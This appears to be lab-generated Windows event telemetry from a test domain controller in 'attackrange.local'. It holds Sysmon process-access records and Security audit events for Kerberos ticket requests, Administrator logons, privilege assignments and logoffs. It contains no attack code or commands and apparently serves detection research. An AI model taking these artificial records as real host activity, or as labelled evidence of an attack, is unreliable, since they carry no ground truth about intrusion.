{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5924,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.768\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.768","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220664,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220665,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{4C751927-E2AD-2460-0186-DA75E1F84E27}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{4C751927-E2AD-2460-0186-DA75E1F84E27}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220666,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{4C751927-E2AD-2460-0186-DA75E1F84E27}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{4C751927-E2AD-2460-0186-DA75E1F84E27}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220667,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x93D6F\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{4C751927-E2AD-2460-0186-DA75E1F84E27}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x93d6f","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{4C751927-E2AD-2460-0186-DA75E1F84E27}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220668,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x93D6F\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x93d6f","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5925,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.768\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.768","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5926,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.768\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.768","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220669,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E474\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e474","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220670,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E1AD\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e1ad","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220671,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x93D6F\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x93d6f","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220672,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x94202\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x94202","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:59:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
